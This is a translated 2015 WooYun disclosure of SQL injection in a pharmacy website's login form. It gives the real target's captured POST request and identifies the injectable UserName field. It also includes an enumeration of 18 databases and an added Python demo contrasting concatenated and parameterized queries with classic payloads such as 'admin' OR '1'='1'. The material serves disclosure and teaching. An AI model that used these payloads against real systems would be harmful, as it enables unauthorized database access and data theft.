Vulnerability summary

Defect ID: wooyun-2015-0136389

Title: SQL injection on a 和平药房 (Heping Pharmacy) site (18 databases involved)

Vendor: hp1997.com

Author: 路人甲

Submitted: 2015-08-26 15:54

Fixed: 2015-08-31 15:56

Published: 2015-08-31 15:56

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-08-26: details sent to the vendor, awaiting the vendor's response
2015-08-31: the vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection

Detailed description:

POST injection

POST /Menu.aspx HTTP/1.1
Host: www.cqpds.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-MicrosoftAjax: Delta=true
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Referer: http://www.cqpds.com/Menu.aspx
Content-Length: 4502
Cookie: ASP.NET_SessionId=lxrrndebrw1f3x45av3zo2v2
Connection: keep-alive
Pragma: no-cache
ctl00%24ScriptManager1=ctl00%24ContentPlaceHolder1%24UpdatePanel_Tree%7Cctl00%24ContentPlaceHolder1%24Login1%24LoginButton&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%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%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%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%2Bd5YiG5oC76YOo6IGM5ZGYEuaxn%2BWIhuaAu%2BmDqOiBjOWRmA%2Fkv53liIbkvpvplIDllYYP5rGf5YiG5L6b5bqU5ZWGEuS5neWIhuaAu%2BmDqOiBjOWRmA%2FljJfnoprkvpvlupTllYYVBgFBAUIBQwFEAUUBTRQrAwZnZ2dnZ2dkZAIDDxQrAAIUKwACFCsAAg8WAh8AaGRkZGRkAgUPDxYMHhBWaXNpYmxlU3RhdHVzYmFyaB4FVGl0bGUFDOS%2FoeaBr%2BaPkOekuh8EGwAAAAAAwHxAAQAAAB4PVmlzaWJsZVRpdGxlYmFyZx4SS2VlcEluU2NyZWVuQm91bmRzZx4RVmlzaWJsZU9uUGFnZUxvYWRoZGQCBw9kFgICAQ8PFggfAwUnL0FwcF9UaGVtZXMvT3JhbmdlL1BpYy9hZDIwMDgxMjExMDIuZ2lmHwQbAAAAAAAogEABAAAAHwEbAAAAAAAgaEABAAAAHwICgANkZAILD2QWAgIDD2QWAmYPZBYCAgEPDxYCHgdWaXNpYmxlZ2QWAgIBDw8WAh8KBTTmnKrlsIblr7nosaHlvJXnlKjorr7nva7liLDlr7nosaHnmoTlrp7kvovjgIIgOTAwMDQyZGQCEw8PFgIfCgUEMjAxNWRkAhUPDxYCHwoFDOWSjOW5s%2BiNr%2BaIv2RkAhcPDxYCHwoFjwHkupLogZTnvZHoja%2Flk4Hkv6Hmga%2FmnI3liqHorrjlj6%2For4HvvJoo5ridKS3pnZ7nu4%2FokKXmgKctMjAwOC0wMDAxIOermeeCuemCrueuse%2B8mjxhIGhyZWY9Im1haWx0bzpocHlmQG1haWwuY3FwZHMuY29tIj5ocHlmQG1haWwuY3FwZHMuY29tPC9hPmRkAhkPDxYEHwoFiwE8c2NyaXB0IHNyYz0naHR0cDovL3M3Ny5jbnp6LmNvbS9zdGF0LnBocD9pZD0xMTg1ODY3JndlYl9pZD0xMTg1ODY3JnNob3c9cGljMScgbGFuZ3VhZ2U9J0phdmFTY3JpcHQnIGNoYXJzZXQ9J2diMjMxMic%2BPC9zY3JpcHQ%2BPGJyIC8%2BPGJyIC8%2BHxRoZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgUFF2N0bDAwJFJhZFdpbmRvd01hbmFnZXIxBRBjdGwwMCRSYWRXaW5kb3cxBRJjdGwwMCRSYWRNZW51X01haW4FLGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkTG9naW4xJExvZ2luQnV0dG9uBSZjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJFJhZFRyZWVWaWV3MTKIsmx8eZTsKv2cOyN4vB0bxvfU&ctl00_RadWindow1_ClientState=&ctl00_RadWindowManager1_ClientState=&ctl00_RadMenu_Main_ClientState=&ctl00%24ContentPlaceHolder1%24Login1%24DropDownList_Class=A&ctl00%24ContentPlaceHolder1%24Login1%24UserName=admin&ctl00%24ContentPlaceHolder1%24Login1%24Password=11111
1&ctl00_ContentPlaceHolder1_RadTreeView1_ClientState=%7B%22expandedNodes%22%3A%5B%5D%2C%22collapsedNodes%22%3A%5B%5D%2C%22logEntries%22%3A%5B%5D%2C%22selectedNodes%22%3A%5B%5D%2C%22checkedNodes%22%3A%5B%5D%2C%22scrollPosition%22%3A0%7D&__ASYNCPOST=true&ctl00%24ContentPlaceHolder1%24Login1%24LoginButton.x=11&ctl00%24ContentPlaceHolder1%24Login1%24LoginButton.y=15


The parameter ctl00%24ContentPlaceHolder1%24Login1%24UserName (the login form's UserName field) is injectable.
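The page does not show the site's server-side code, so the following is an added illustration (not the vendor's code and not part of the original report) of the pattern that makes a login form's UserName field injectable: the three submitted fields (UserName, Password, DropDownList_Class in the request above) concatenated into the query text, next to the parameterized form that closes the hole. The user table, credentials and the `cls` column are constructed sample data; the real backend is SQL Server (master, msdb, model and tempdb in the dump are its system databases), and SQLite is used only so the example runs offline. Both payloads behave the same way on SQL Server.

```python
import sqlite3

# Constructed sample data standing in for the site's user table.
SAMPLE_USERS = [
    ("admin", "s3cret", "A"),
    ("pharmacist", "hunter2", "B"),
]


def setup_db():
    """Create an in-memory database holding the constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, cls TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, username, password, cls):
    """Hypothetical reconstruction of the injectable pattern: the form fields
    are spliced into the SQL text, so a quote in UserName changes the query
    structure instead of being compared as data."""
    sql = (
        "SELECT COUNT(*) FROM users WHERE username = '" + username + "'"
        " AND password = '" + password + "'"
        " AND cls = '" + cls + "'"
    )
    return conn.execute(sql).fetchone()[0] > 0


def login_parameterized(conn, username, password, cls):
    """Hardened form: bound parameters keep the input as data, never as SQL."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ? AND cls = ?"
    return conn.execute(sql, (username, password, cls)).fetchone()[0] > 0


# Two classic payloads for the UserName field. The password stays the wrong
# value the captured request sends (11111); only the username is attacker-shaped.
# AND binds tighter than OR, so the admin row matches regardless of the password clause.
PAYLOAD_TAUTOLOGY = "admin' OR '1'='1"
# A line comment truncates the password and class checks entirely.
PAYLOAD_COMMENT = "admin' --"


def compare(conn, payload, wrong_password="11111", cls="A"):
    """Return (vulnerable_result, parameterized_result) for one UserName payload."""
    return (
        login_vulnerable(conn, payload, wrong_password, cls),
        login_parameterized(conn, payload, wrong_password, cls),
    )


if __name__ == "__main__":
    db = setup_db()
    for name, payload in (("tautology", PAYLOAD_TAUTOLOGY), ("comment", PAYLOAD_COMMENT)):
        vuln, safe = compare(db, payload)
        print(f"{name:10s} vulnerable={vuln} parameterized={safe}")
```

With the concatenated query both payloads log in as admin with a wrong password; with bound parameters the same strings are simply usernames that match nothing. The real fix for an ASP.NET site is the same idea with `SqlParameter`, plus a single low-privilege database login for the web application, since the enumeration below shows the injected login could see every database on the server, including the system databases.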


Proof of vulnerability:

Database enumeration through the injection point (names whose characters failed to decode are shown as the tool printed them):


available databases [18]:
[*] [\\?f9hManager!]
[*] [msdb\t]
[*] [ZH\\?81BCONV\\?81RT]
[*] [zh\\?81bTurn]
[*] [ZHDB\\?81istory]
[*] [ZHDB\t]
[*] aHDBZT000915
[*] bf
[*] BFSJ
[*] master
[*] model
[*] NetWeb
[*] tempdb
[*] UserTmp
[*] zhdbbak
[*] zhdbinfo
[*] ZHDBZT000814
[*] ZHDBZT000914



Fix recommendation:

Bro, give me a gift, my family is poor.

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-08-31 15:56

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None